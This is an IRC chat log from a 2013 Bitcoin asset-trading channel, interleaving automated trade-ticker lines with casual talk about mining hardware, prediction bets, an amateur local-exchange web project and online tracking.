00:50:01 [MPEX] [S.DICE] 1000 @ 0.00286001 = 2.86 BTC [-] May 12 00:50:01 [MPEX] [S.DICE] 1398 @ 0.00286 = 3.9983 BTC [-] May 12 00:50:49 s.dice P/E ratio is around 4 May 12 00:50:54 which is crazy May 12 00:51:08 kinda May 12 00:51:26 [BTCTC] [B.YABMC] 30 @ 0.015979 = 0.4794 BTC [+] May 12 00:51:43 [BTCTC] [B.YABMC] 1 @ 0.01598 BTC [+] May 12 00:51:54 if you had done the article when it was trading around 6 it would have been higher up May 12 00:52:13 but, a snapshot is always subjective May 12 00:52:14 [BTCTC] [B.YABMC] 50 @ 0.01599 = 0.7995 BTC [+] May 12 00:52:38 [BTCTC] [B.YABMC] 83 @ 0.016498 = 1.3693 BTC [+] May 12 00:52:56 [BTCTC] [B.YABMC] 100 @ 0.016499 = 1.6499 BTC [+] May 12 00:53:16 yea May 12 00:56:05 hm May 12 00:56:11 bitstamp overtook btce May 12 00:56:15 [BTCTC] [TAT.ASICMINER] 160 @ 0.01499 = 2.3984 BTC [+] May 12 00:59:18 wow pgp doesn't take command line input of text to encrypt May 12 00:59:28 *bitch bitch bitch bitch* **** ENDING LOGGING AT Sun May 12 01:03:52 2013 **** BEGIN LOGGING AT Sun May 12 01:10:35 2013 May 12 01:10:59 -NickServ- You failed to identify in time for the nickname mircea_popescu May 12 01:11:05 [HAVELOCK] [ASICM] 175 @ 0.01455101 = 2.5464 BTC [-] May 12 01:11:06 [HAVELOCK] [ASICM] 150 @ 0.014551 = 2.1827 BTC [-] May 12 01:11:08 [HAVELOCK] [ASICM] 175 @ 0.01455 = 2.5463 BTC [-] May 12 01:12:01 [BTCTC] [ASICMINER-PT] 1 @ 1.447401 BTC [-] May 12 01:12:06 [BTCTC] [ASICMINER-PT] 7 @ 1.4474 = 10.1318 BTC [-] May 12 01:12:12 [BTCTC] [ASICMINER-PT] 5 @ 1.447301 = 7.2365 BTC [-] May 12 01:12:18 [BTCTC] [ASICMINER-PT] 14 @ 1.4471 = 20.2594 BTC [-] May 12 01:16:26 [BTCTC] [ASICMINER-PT] 1 @ 1.487499 BTC [+] May 12 01:18:00 Python interface unloaded May 12 01:18:00 Tcl interface unloaded **** ENDING LOGGING AT Sun May 12 01:18:00 2013 **** BEGIN LOGGING AT Sun May 12 14:20:16 2013 May 12 14:47:51 kakobrekla http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 12 14:48:02 i wanna bet but i dunno which way ;/ May 12 14:51:51 ThickAsThieves pretty cool logo i say. May 12 15:05:03 http://www.guardian.co.uk/world/2013/may/10/canadian-mafia-killed-sicily-hit May 12 15:05:08 dun dun dun May 12 15:30:39 cads was last seen in #bitcoin-assets 6 days, 17 hours, 2 minutes, and 26 seconds ago: benkay: lets talk more about 3dp later - I think there is a great future in personal desktop-based manufacturing, and it seems like 3dp is positioned to bring it to the consumer. There are lots of points of contention I'd love to chat about, but I gotta jet. May 12 15:31:19 ;;next May 12 15:31:19 consolidation around 117 | resistance 121 | support: 112-113 | breakout targets: 131, 145 | #bitcoin [Sat, 11 May 2013 16:14:18 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 20 hours, 17 minutes, and 0 seconds ago May 12 15:39:23 ;;eauth mircea_popescu May 12 15:39:23 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 May 12 15:39:44 ;;everify freenode:#bitcoin-otc:0b6173aa473eed3fabcb4926c99a7e85ea3c86d6f8f9de54eaece017 May 12 15:39:45 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 May 12 15:40:21 ;;rate mvrak -10 Prolly a scammer per https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 May 12 15:40:22 Rating entry successful. Your rating of -10 for user mvrak has been recorded. May 12 15:55:11 ;;eauth error4733 May 12 15:55:11 Error: This nick is not registered. Please register. May 12 16:02:58 ;;bids 101 May 12 16:02:58 There are currently 30155.256 bitcoins demanded at or over 101.0 USD, worth 3203719.59897 USD in total. | Data vintage: 110.6834 seconds May 12 16:03:11 ;;asks 126 May 12 16:03:15 There are currently 29146.866 bitcoins offered at or under 126.0 USD, worth 3555891.07381 USD in total. | Data vintage: 0.0050 seconds May 12 16:17:12 mircea_popescu thats interesting, the guy just pinged me May 12 16:17:31 o you know him ? May 12 16:17:36 ofc May 12 16:24:47 [BTCTC] [ASICMINER-PT] 1 @ 1.4994 BTC [+] May 12 16:27:55 i dont even think luke jr has -10 May 12 16:28:25 [07:51] ThickAsThieves pretty cool logo i say. <<< Thank you, sir! May 12 16:32:02 [HAVELOCK] [VTX] 2 @ 0.42570001 = 0.8514 BTC [-] May 12 16:38:01 [HAVELOCK] [VTX] 1 @ 0.4257 BTC [-] May 12 16:41:01 [HAVELOCK] [VTX] 5 @ 0.42570001 = 2.1285 BTC [+] May 12 16:41:42 show logo TAT May 12 16:43:12 ;;last see bugpowder May 12 16:43:19 ;;last seen bugpowder May 12 16:45:02 [HAVELOCK] [SDICE] 14 @ 0.2992 = 4.1888 BTC [-] May 12 16:52:02 [MPEX] [S.MPOE] 4474 @ 0.00070853 = 3.17 BTC [-] May 12 16:52:05 [MPEX] [S.MPOE] 376 @ 0.00070766 = 0.2661 BTC [-] May 12 17:00:30 [BTCTC] [COGNITIVE] 1 @ 0.18167 BTC [-] May 12 17:00:46 [BTCTC] [COGNITIVE] 4 @ 0.181662 = 0.7266 BTC [-] May 12 17:00:56 [BTCTC] [COGNITIVE] 1 @ 0.181661 BTC [-] May 12 17:01:03 [BTCTC] [COGNITIVE] 3 @ 0.1752 = 0.5256 BTC [-] May 12 17:06:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.014737 BTC [+] May 12 17:11:02 [HAVELOCK] [ASICM] 15 @ 0.01494499 = 0.2242 BTC [+] May 12 17:16:09 [MPEX] [S.MPOE] 3945 @ 0.00070766 = 2.7917 BTC [-] May 12 17:16:11 [MPEX] [S.MPOE] 1985 @ 0.00070766 = 1.4047 BTC [-] May 12 17:26:02 [MPEX] [O.USD.C104T] 5 @ 0.2 = 1 BTC [-] May 12 17:27:36 ;;ticker May 12 17:28:02 BTCUSD ticker | Best bid: 114.11000, Best ask: 114.14999, Bid-ask spread: 0.03999, Last trade: 114.11000, 24 hour volume: 26149.79301925, 24 hour low: 112.40000, 24 hour high: 117.73495, 24 hour vwap: 114.64794 May 12 17:32:51 [BTCTC] [ASICMINER-PT] 1 @ 1.475514 BTC [-] May 12 17:32:54 [BTCTC] [ASICMINER-PT] 1 @ 1.475513 BTC [-] May 12 17:33:06 [BTCTC] [ASICMINER-PT] 1 @ 1.475513 BTC [-] May 12 17:33:08 [BTCTC] [ASICMINER-PT] 2 @ 1.475506 = 2.951 BTC [-] May 12 17:39:11 [BTCTC] [TAT.ASICMINER] 16 @ 0.0146 = 0.2336 BTC [-] May 12 17:46:01 [HAVELOCK] [ASICM] 185 @ 0.01494499 = 2.7648 BTC [+] May 12 17:48:03 [BTCTC] [ASICMINER-PT] 1 @ 1.474301 BTC [-] May 12 17:48:07 [BTCTC] [ASICMINER-PT] 1 @ 1.4743 BTC [-] May 12 17:48:56 [MPEX] [S.MPOE] 2371 @ 0.00071108 = 1.686 BTC [+] May 12 17:48:58 [MPEX] [S.MPOE] 4321 @ 0.00071146 = 3.0742 BTC [+] May 12 17:49:02 [MPEX] [S.MPOE] 10258 @ 0.00071147 = 7.2983 BTC [+] May 12 17:51:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1855 BTC [+] May 12 18:10:02 [HAVELOCK] [HIM] 4 @ 2.4499 = 9.7996 BTC [-] May 12 18:12:18 [BTCTC] [TAT.ASICMINER] 9 @ 0.014234 = 0.1281 BTC [-] May 12 18:14:48 [BTCTC] [ASICMINER-PT] 1 @ 1.477 BTC [+] May 12 18:15:37 hi all May 12 18:15:44 hey May 12 18:15:48 whats new May 12 18:15:55 10 alt chains May 12 18:15:58 hehehe May 12 18:16:07 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [-] May 12 18:16:15 i explained skateboards to a reporter from financial times May 12 18:16:17 ;) May 12 18:16:29 :o May 12 18:16:46 sell all btc May 12 18:20:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.014739 BTC [+] May 12 18:23:02 [HAVELOCK] [KCIM] 8 @ 1.46 = 11.68 BTC [-] May 12 18:28:02 [HAVELOCK] [HIM] 5 @ 2.3797 = 11.8985 BTC [-] May 12 18:40:02 [HAVELOCK] [KCIM] 2 @ 1.2422 = 2.4844 BTC [-] May 12 18:42:02 [HAVELOCK] [HIM] 1 @ 2.3797 BTC [-] May 12 18:42:42 [BTCTC] [ASICMINER-PT] 2 @ 1.477 = 2.954 BTC [+] May 12 18:44:02 [HAVELOCK] [ASICM] 50 @ 0.01466 = 0.733 BTC [-] May 12 18:44:04 [HAVELOCK] [ASICM] 25 @ 0.01465 = 0.3663 BTC [-] May 12 18:49:20 [BTCTC] [ASICMINER-PT] 1 @ 1.496 BTC [+] May 12 18:55:17 Jurov, has mircea_popescu processed withdrawals? May 12 18:55:33 not yet May 12 18:56:09 word May 12 18:56:09 no way with 4 fingers !! May 12 18:56:16 I need to make dealz yo! May 12 18:56:37 like hotcakes May 12 19:04:32 [BTCTC] [COGNITIVE] 1 @ 0.180081 BTC [+] May 12 19:04:36 [BTCTC] [COGNITIVE] 1 @ 0.18 BTC [-] May 12 19:04:48 [BTCTC] [COGNITIVE] 1 @ 0.1771 BTC [-] May 12 19:05:00 [BTCTC] [COGNITIVE] 1 @ 0.176 BTC [-] May 12 19:05:12 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 12 19:05:18 [BTCTC] [COGNITIVE] 1 @ 0.1753 BTC [-] May 12 19:05:29 sooo who dares? May 12 19:06:55 withdrawals are unfashionable anyway May 12 19:07:39 bitbet payouts too, seems May 12 19:07:55 meanwhile : http://polimedia.us/dtng/c/src/136747629696.jpg May 12 19:08:26 on which planet May 12 19:08:55 this planet: http://bitbet.us/bet/240/tesla-elon-musk-to-post-an-apology-re-the/ May 12 19:09:03 blah wot is down May 12 19:09:07 just when you need it May 12 19:09:13 ahh it's not resolved yet May 12 19:09:47 [BTCTC] [ASICMINER-PT] 1 @ 1.498498 BTC [+] May 12 19:12:17 [MPEX] [S.MPOE] 4321 @ 0.00071122 = 3.0732 BTC [-] May 12 19:12:18 [MPEX] [S.MPOE] 2660 @ 0.00071147 = 1.8925 BTC [+] May 12 19:15:19 [BTCTC] [ASICMINER-PT] 1 @ 1.498498 BTC [+] May 12 19:20:38 [BTCTC] [COGNITIVE] 1 @ 0.175121 BTC [-] May 12 19:20:43 [BTCTC] [COGNITIVE] 1 @ 0.17512 BTC [-] May 12 19:27:38 [BTCTC] [COGNITIVE] 1 @ 0.17511 BTC [-] May 12 19:27:42 [BTCTC] [COGNITIVE] 1 @ 0.1751 BTC [-] May 12 19:38:37 .close May 12 19:46:37 !ticker May 12 19:46:38 Quest for vision is a great blessing. May 12 19:46:44 ;;ticker May 12 19:48:52 gribble is dead :/ May 12 19:49:13 ;;eightball gribble is dead ? May 12 19:49:34 eightball is dead May 12 19:51:43 in -otc there is altgribble and backupgribble.. but they're dead too May 12 19:55:53 where the fuck did nanotube go May 12 19:55:53 [BTCTC] [ASICMINER-PT] 1 @ 1.4801 BTC [-] May 12 19:56:05 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [-] May 12 19:56:19 [BTCTC] [ASICMINER-PT] 1 @ 1.475 BTC [-] May 12 19:56:22 ;;seen nanotube May 12 19:57:25 lol~ May 12 19:57:28 poor gribs May 12 19:57:48 ;;ticker May 12 19:57:49 BTCUSD ticker | Best bid: 114.91000, Best ask: 115.05000, Bid-ask spread: 0.14000, Last trade: 114.91000, 24 hour volume: 25969.93487207, 24 hour low: 112.40000, 24 hour high: 117.47000, 24 hour vwap: 114.51241 May 12 19:57:52 okay May 12 19:58:08 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/s May 12 19:58:14 so 33:1 eh May 12 19:58:42 that needs a list of known shills May 12 19:59:02 [HAVELOCK] [ASICM] 2 @ 0.0147 = 0.0294 BTC [+] May 12 19:59:03 [HAVELOCK] [ASICM] 98 @ 0.01469 = 1.4396 BTC [-] May 12 20:00:13 thanks jurov May 12 20:01:01 what for? May 12 20:01:15 [BTCTC] [COGNITIVE] 2 @ 0.16 = 0.32 BTC [-] May 12 20:01:20 [BTCTC] [COGNITIVE] 1 @ 0.15997 BTC [-] May 12 20:01:28 i am not aware that i made backupgribble manifest somehow May 12 20:01:31 [BTCTC] [COGNITIVE] 2 @ 0.157 = 0.314 BTC [-] May 12 20:01:32 wow, bitfury might actually know what they're doing May 12 20:02:53 or they are willing to pay 100btc to have you think so May 12 20:02:57 ;) May 12 20:03:15 are they doing an ipo somewhere? May 12 20:04:18 [MPEX] [S.MPOE] 9300 @ 0.00071137 = 6.6157 BTC [-] May 12 20:05:11 dunno May 12 20:05:18 they have fairly sexy gfx tho May 12 20:05:27 http://www.bitfury.org/ May 12 20:09:01 no mention of ASICs, only FPGA May 12 20:09:13 but they seem to really have some expertise May 12 20:09:38 yeah i been in touch with him for over a year now May 12 20:10:08 a bunch of stuff is behind the scenes May 12 20:12:14 wire that shit into your house May 12 20:12:20 mint coins May 12 20:12:22 heat home May 12 20:12:30 ThickAsThieves or that. tho it's open for the taking if that's true May 12 20:12:54 benkay i seriously think houses will be built with asic floor heating in 10-20 years May 12 20:13:24 lol May 12 20:13:32 but what about Floirida? May 12 20:14:05 Florida* May 12 20:14:33 T'sup I'm in Florida. Its still here. May 12 20:14:42 F'n hot today. May 12 20:14:55 looking forward to heated ASIC floors? May 12 20:15:26 maybe Florida gets ASIC solar panels instead May 12 20:15:32 http://en.wikipedia.org/wiki/Palm_Beach,_Florida May 12 20:16:21 any idea where i can buy some avalon chip ? (small quantity) May 12 20:17:08 The racial makeup of the town is 96% Euro American May 12 20:17:22 error, there are many people selling chips on the forums May 12 20:17:53 EuroAmerican seems a pretty broad description May 12 20:18:18 mircea_popescu: so we'll gonna change floor tiles every season? May 12 20:18:24 solar panels to supply a 3D printer factory with miner sandwiched May 12 20:18:29 why ? you don't have to keep it powered. May 12 20:18:51 basically it will be like, if you heat your floor you can recoup 50% of elec cost via mining May 12 20:18:52 ASIC microwaves May 12 20:18:59 they will be obsolete in a year May 12 20:19:01 overclocking for your overeating May 12 20:19:03 there will be something like 1 trn sq feet of asic flooring May 12 20:19:07 i was wondering May 12 20:19:11 doing whatever many yotta hashes May 12 20:19:24 [BTCTC] [ASICMINER-PT] 1 @ 1.4742 BTC [-] May 12 20:19:35 i figure that it would be possible with 3D printing to create a coin that must be broken open to read the private key May 12 20:19:38 I'm gonna hack your floors May 12 20:19:39 jurov this relies on the theory that there's an equilibrium point May 12 20:19:53 MJR_ this is actually a ghood idea. May 12 20:19:55 fortunecoinz May 12 20:19:57 it could print the private key on the inside of the coin May 12 20:20:04 pretty much the only practical application for 3d printing i see May 12 20:20:12 i mean, you still have to trust that they didn't just copy it May 12 20:20:13 make the process automated, put it all under plexiglass or w./e May 12 20:20:14 and that's it May 12 20:20:18 i wanted to do it with chocolate May 12 20:20:25 BUT, if automated, it would do it without you knowing the key at all May 12 20:20:37 chococoins May 12 20:20:40 lol May 12 20:20:46 chocolate would work too i suppose May 12 20:20:53 or guns May 12 20:20:59 lol May 12 20:21:00 http://shrani.si/f/46/qT/4q4CVxEu/photo.jpg May 12 20:21:01 pewpewcoins May 12 20:21:02 here you go guys May 12 20:21:08 a photo of never seen in public May 12 20:21:11 fury board May 12 20:21:13 MJR already done May 12 20:21:13 fpga May 12 20:21:14 but yeah, if you put the source up, and have a way to monitor that you are running that program May 12 20:21:17 300 mhash per chip May 12 20:21:22 people could conceivably have more trust May 12 20:21:22 kako delivers. May 12 20:21:34 kakobrekla of ? May 12 20:21:40 what May 12 20:21:42 a May 12 20:21:56 insert a private key in a block of plastique May 12 20:22:05 need to be broken to reddem May 12 20:22:08 ah cool May 12 20:22:10 how many hashes per board? May 12 20:22:11 where can you get? May 12 20:22:18 that's a lotta caps May 12 20:22:20 cant find the link, let me check a gain May 12 20:22:24 you cant get it anymore May 12 20:22:26 error4733 thanks May 12 20:22:39 10 chips at 300 mhash each May 12 20:22:41 i wanna see a tube board May 12 20:22:42 per board May 12 20:22:44 kakobrekla, our virtex 6 might get 1.2-1.5 GH May 12 20:22:51 for warmer sound May 12 20:22:57 MJR_ fpga is dead May 12 20:22:58 so far as i've seen, most people only got 600 mhs May 12 20:23:04 kakobrekla, of course May 12 20:23:10 but designing better chips isn't May 12 20:23:50 mhm May 12 20:23:56 anyway these were sold last year May 12 20:23:58 and also, it's only dead if you have to pay for equipment or electricity May 12 20:24:10 in october or so May 12 20:24:16 when bfl announced May 12 20:24:19 in what scenarios does one get away without paying for equipment or electricity, MJR? May 12 20:24:35 eh planned to deliver May 12 20:24:37 BFL figured it out May 12 20:24:37 not announced May 12 20:24:40 check out buttonwood.btcshares.com May 12 20:24:51 they didnt have to pay for shit May 12 20:24:53 benkay, someone else pays for it May 12 20:25:00 obviously May 12 20:25:11 for example: my apt has electricity included May 12 20:25:27 well May 12 20:25:31 anyways, i got geolocate up on buttonwood May 12 20:25:36 still working on user accounts May 12 20:25:52 [BTCTC] [B.YABMC] 1 @ 0.01849 BTC [+] May 12 20:25:54 i just did it to show that it could be done May 12 20:26:05 [BTCTC] [B.YABMC] 1 @ 0.01849 BTC [+] May 12 20:26:12 which you all know, but some other people didn't May 12 20:26:30 maximo i heart this project mega May 12 20:26:46 which project? May 12 20:26:48 buttonwood May 12 20:26:51 buttonwood May 12 20:26:54 you are welcome to contribute on github May 12 20:27:01 <----rank amateur May 12 20:27:08 next is tmrw ? May 12 20:27:13 yes May 12 20:27:25 tmrw we have second live exchange May 12 20:27:25 i may, but i'm a bit slammed May 12 20:27:35 everyone else is invited too May 12 20:27:39 give me 400box i'll take the plane to trade 1 or 2btc :) May 12 20:27:45 or if you just want to point me in the right direction May 12 20:27:50 little trouble on user accounts May 12 20:28:27 $200 May 12 20:28:28 nice May 12 20:28:47 i need to make it so that each user 1. Displays their username, and the name field becomes not editable May 12 20:28:49 is there some sort of radius control? May 12 20:28:57 2. can only update/cancel their own orders May 12 20:28:58 AUTH TO WOT May 12 20:28:59 not yet May 12 20:29:06 wot is down May 12 20:29:15 benkay, and yes, i plan on integrating with WoT eventually May 12 20:29:21 no radius control yet May 12 20:29:25 but soon, that will be added May 12 20:29:28 the super resilient pgp contract economy in action May 12 20:29:32 to show whether orders are actionable or not May 12 20:29:41 awesome man May 12 20:29:47 why thanks May 12 20:29:52 i wish i was better programmer May 12 20:29:57 so it'd be done already May 12 20:30:00 it is super easy May 12 20:30:04 i just don't know all the stuff yet May 12 20:30:11 learn all of the things May 12 20:30:20 you'll notice that you can log in with facebook and twitter or create a local account May 12 20:30:24 google doesn't work yet May 12 20:31:01 meh May 12 20:31:04 wot wot wot May 12 20:31:06 i would also like profile pics, ability to alert user that you wish to trade, integrated btc address, maybe coinapult for easier transfer May 12 20:31:12 and in app chat May 12 20:31:20 you got a vision May 12 20:31:21 run with it May 12 20:31:22 yeah May 12 20:31:27 once it is up and running version 1 May 12 20:31:33 i can offer it out to other communities May 12 20:31:43 might be worth your time to put up some issues May 12 20:31:48 and hopefully grass root street level exchanges pop up May 12 20:31:57 issues? May 12 20:32:08 on github? May 12 20:32:09 yeah github's feature/bug/whatever tracker May 12 20:32:09 i will May 12 20:32:14 good idea May 12 20:32:22 this is my first time really using github May 12 20:32:23 now don't expect me to start making prs or anything May 12 20:32:25 to manage a project May 12 20:32:28 lol May 12 20:32:48 oh yeah, i also need to create a "prints/last" stream of data May 12 20:33:05 lots to be done May 12 20:33:14 yup May 12 20:33:17 can someone test the gps? it seems to work on my phone May 12 20:33:29 a link to repository on homepage would also do ya good May 12 20:33:41 working for me May 12 20:33:43 good idea May 12 20:33:47 benkay, awesome!!!! May 12 20:33:58 now you know where i live dude May 12 20:34:10 thanks googs. May 12 20:34:16 lol May 12 20:34:20 i am not monitoriing that info May 12 20:34:21 now May 12 20:34:25 someone is tho May 12 20:34:31 i gave up on privacy a loooong time ago May 12 20:34:34 its only in your browser at the moment May 12 20:34:42 trivially overcome May 12 20:34:47 i can add that May 12 20:34:50 i haven't added it yet May 12 20:34:58 but i will need to in order to change order status May 12 20:34:59 of course May 12 20:35:07 just saying right now, it is just Proof of Concept May 12 20:35:15 only alerts you to your location May 12 20:35:20 which is not very useful May 12 20:35:27 gonna try to change it to a button May 12 20:35:39 the scariest of all is the google skyhook thingy May 12 20:35:58 the one that pinpoints your location based on nearby wifi SSIDs May 12 20:37:01 lol yeah May 12 20:37:05 give up May 12 20:37:09 chrome has it May 12 20:37:09 yep ! google was sued in my country for that May 12 20:37:17 off by default though May 12 20:37:21 i can figure out pretty much who you are just from the cookies you carry when you hit a page i control May 12 20:37:55 blows my mind that all of these crm companies and lead management companies don't do that automatically May 12 20:38:13 'hey sendgrid, will you automatically populate my lead information with this api?' May 12 20:38:15 'wat' May 12 20:38:16 >.< May 12 20:40:27 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1855 = 0.371 BTC [+] May 12 20:40:53 there were some tales circulating around HN about that, actually - wherein certain services offer websites to participate in mass user data agglomeration - so that when a user fills up a form on one website, (1) that form data can be autofilled on other, seemingly unrelated websites (via cookies); and (2) when the same user enters the same / uniquely identifiable data in another website even using another computer etc., that other website May 12 20:41:05 basically matching identities by formdata entered on various websites May 12 20:41:07 Where has Bowjob been? May 12 20:41:16 kinda scary actually. May 12 20:41:26 Framedragger: don't think that's possible May 12 20:41:44 Scrat, which part is not possible? May 12 20:42:01 cookies or autofill spanning across different domains May 12 20:42:06 it's only possible for websites already participating in the agglomeration network May 12 20:42:27 ah ok then May 12 20:42:38 sort of like the facebook like JS May 12 20:42:47 oh - in regards to cookies - yeah it's not that simple i suppose, still need a third party May 12 20:42:50 yeah May 12 20:45:05 so...weird May 12 20:45:13 it autochanges my link to point at my own site May 12 20:55:27 [BTCTC] [PAJKA.BOND] 10 @ 0.109 = 1.09 BTC [-] May 12 20:55:31 k May 12 20:55:35 i added link to github May 12 20:55:44 geolocate works May 12 20:55:51 though is not implemented properly May 12 21:01:01 [BTCTC] [ASICMINER-PT] 1 @ 1.4965 BTC [+] May 12 21:02:40 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [-] May 12 21:02:52 ;;seen bowjob May 12 21:02:52 bowjob was last seen in #bitcoin-assets 6 weeks, 1 day, 13 hours, 11 minutes, and 45 seconds ago: https://bitcointalk.org/index.php?topic=161230.msg1703283#new May 12 21:03:05 6 weeks May 12 21:03:12 [BTCTC] [PAJKA.BOND] 9 @ 0.109 = 0.981 BTC [-] May 12 21:07:15 ;;seen gribble May 12 21:07:15 I have not seen gribble. May 12 21:07:19 scam. May 12 21:09:28 [BTCTC] [ASICMINER-PT] 1 @ 1.499297 BTC [+] May 12 21:09:45 [BTCTC] [ASICMINER-PT] 1 @ 1.499297 BTC [+] May 12 21:09:51 [BTCTC] [ASICMINER-PT] 3 @ 1.499298 = 4.4979 BTC [+] May 12 21:10:44 for some reason i can't get this button to work May 12 21:11:16 ;;seen nanotube May 12 21:11:16 nanotube was last seen in #bitcoin-assets 6 weeks, 6 days, 20 hours, 32 minutes, and 45 seconds ago: well, if there are no mutually trusted third parties, i guess this is a non-starter. May 12 21:12:27 krs1 nanotube was last seen in #bitcoin-analysis 22 minutes and 34 seconds ago: ;;next May 12 21:13:51 sup May 12 21:14:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.014739 = 0.2063 BTC [+] May 12 21:17:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.014939 = 0.0448 BTC [+] May 12 21:23:52 [BTCTC] [ASICMINER-PT] 16 @ 1.499298 = 23.9888 BTC [+] May 12 21:25:32 [BTCTC] [ASICMINER-PT] 3 @ 1.4993 = 4.4979 BTC [+] May 12 21:26:13 [BTCTC] [ASICMINER-PT] 14 @ 1.4999 = 20.9986 BTC [+] May 12 21:29:39 [BTCTC] [COGNITIVE] 1 @ 0.16 BTC [+] May 12 21:34:01 [HAVELOCK] [ASICM] 100 @ 0.0147 = 1.47 BTC [+] May 12 21:40:21 [BTCTC] [S.MPOE-PT] 14 @ 0.000695 = 0.0097 BTC [-] May 12 21:42:01 [HAVELOCK] [ASICM] 3 @ 0.0148 = 0.0444 BTC [+] May 12 21:50:53 [MPEX] [S.MPOE] 5100 @ 0.00070956 = 3.6188 BTC [-] May 12 21:53:26 [BTCTC] [COGNITIVE] 3 @ 0.16 = 0.48 BTC [+] May 12 21:54:51 [BTCTC] [ASICMINER-PT] 1 @ 1.499901 BTC [+] May 12 21:54:58 [BTCTC] [ASICMINER-PT] 1 @ 1.49997 BTC [+] May 12 21:55:05 [BTCTC] [ASICMINER-PT] 5 @ 1.49997 = 7.4999 BTC [+] May 12 21:55:11 [BTCTC] [ASICMINER-PT] 13 @ 1.49998 = 19.4997 BTC [+] May 12 22:03:01 [HAVELOCK] [ASICM] 38 @ 0.01492999 = 0.5673 BTC [+] May 12 22:07:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.01488 = 0.0446 BTC [-] May 12 22:11:02 [BTCTC] [B.YABMC] 2 @ 0.01849 = 0.037 BTC [+] May 12 22:17:01 [HAVELOCK] [SDICE] 4 @ 0.2752 = 1.1008 BTC [-] May 12 22:21:50 [MPEX] [S.MPOE] 10750 @ 0.00070924 = 7.6243 BTC [-] May 12 22:21:52 [MPEX] [S.MPOE] 4979 @ 0.00070809 = 3.5256 BTC [-] May 12 22:23:02 http://www.suntimes.com/news/steinberg/14342418-452/companies-dont-care-but-we-do.html May 12 22:23:11 matthew wright guy has a point eh. May 12 22:23:51 [BTCTC] [TAT.ASICMINER] 12 @ 0.01488 = 0.1786 BTC [-] May 12 22:26:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.01489 = 0.1489 BTC [+] May 12 22:34:38 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [-] May 12 22:35:39 [BTCTC] [ASICMINER-PT] 1 @ 1.49998 BTC [+] May 12 22:35:56 who want to get together and make a anonymous exchange for crytocurrency? May 12 22:36:29 [BTCTC] [S.DICE-PT] 140 @ 0.003189 = 0.4465 BTC [+] May 12 22:37:18 [BTCTC] [ASICMINER-PT] 11 @ 1.49999 = 16.4999 BTC [+] May 12 22:39:31 [BTCTC] [ASICMINER-PT] 38 @ 1.49999 = 56.9996 BTC [+] May 12 22:41:16 newmorpheus007 who are you. May 12 22:41:48 [BTCTC] [ASICMINER-PT] 1 @ 1.49999 BTC [+] May 12 22:49:01 man May 12 22:49:04 boycott something useful May 12 22:49:09 like rare earths extraction May 12 22:50:34 benkay what? i don't follow May 12 22:50:46 mp posted a link earlier May 12 22:50:57 http://www.suntimes.com/news/steinberg/14342418-452/companies-dont-care-but-we-do.html May 12 22:51:12 yes, but it refuses to load May 12 22:51:36 sun times probably blacklisted europe or something hilarious May 12 22:51:41 vtunnel.com? May 12 22:52:40 benkay, check it out now May 12 22:52:46 okay it works.. (not vtunnel but other thing i'm using for trilema) May 12 22:52:48 getting better May 12 22:52:58 no null fields in price and size May 12 22:53:02 location button May 12 22:53:07 links to github and blog May 12 22:53:21 all i need now is to get user_accounts working May 12 22:53:44 and it will be ready to go for monday (rough but functional) May 12 22:56:25 so what do you think benkay? May 12 22:56:30 i should commit this now May 12 22:56:59 now i read it... and still don't see how rare earths extraction would be different May 12 22:57:57 looks great maximo May 12 22:58:00 if peeps, say, boycotted TV or like, that could cause something to happen May 12 22:58:05 except that i can delete others orders May 12 22:58:22 [MPEX] [S.MPOE] 4321 @ 0.00070833 = 3.0607 BTC [+] May 12 22:58:24 [MPEX] [S.MPOE] 6490 @ 0.00070809 = 4.5955 BTC [-] May 12 22:59:01 jurov, i wasn't saying that it would be effective, just that i might be able to get behind it May 12 22:59:15 i am extremely tired of gender and sexuality politics May 12 22:59:23 rub your shit on whatever feels good, kids May 12 22:59:29 let's all grow up about bodies May 12 23:00:05 it's not so much about bodies, rather about religion May 12 23:00:34 yeah. still talking about that grow the fuck up shit. May 12 23:01:01 today i happened to read catholic newspaper my parents keep buying May 12 23:01:15 by accident? May 12 23:01:19 I gather your brain didn't melt and pour out of your ears? May 12 23:01:30 the bubble reality it tries to create... made me cringe May 12 23:01:49 benkay o, the forum is about to blow with that shit. May 12 23:01:50 my brain is used to it, i was raised as catholic.. but i forgot somewhat May 12 23:02:09 the girl is expertly bringing the recent lefty driftwood to boiling point May 12 23:02:39 link? May 12 23:02:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.01489 = 0.0745 BTC [+] May 12 23:03:06 im not even sure, a lot of stuff about hate and priviledge and whatnot May 12 23:03:16 fallout from that guy's racist failure. May 12 23:03:22 ho ho May 12 23:03:34 the only people who care about privilege have none May 12 23:03:37 doh. May 12 23:03:41 https://bitcointalk.org/index.php?action=profile;u=52741;sa=showPosts May 12 23:03:51 priviledge = that guy worked while i dicked about, now he has shit May 12 23:03:53 unfair! May 12 23:04:26 now now that's a vast oversimplification May 12 23:04:40 that guy inherited capital which made his ventures a little more easily pulled off May 12 23:04:41 or May 12 23:04:50 yeah. so ? May 12 23:04:54 that dude's a dude and therefore it's easier for him to build and run a company than me, a woman May 12 23:04:56 or May 12 23:04:58 he inherited it from his daddy, who worked. May 12 23:05:12 the objected-to point is that people get bonuses for not working May 12 23:05:18 as long as someone worked at some point i guess May 12 23:05:20 this is what's 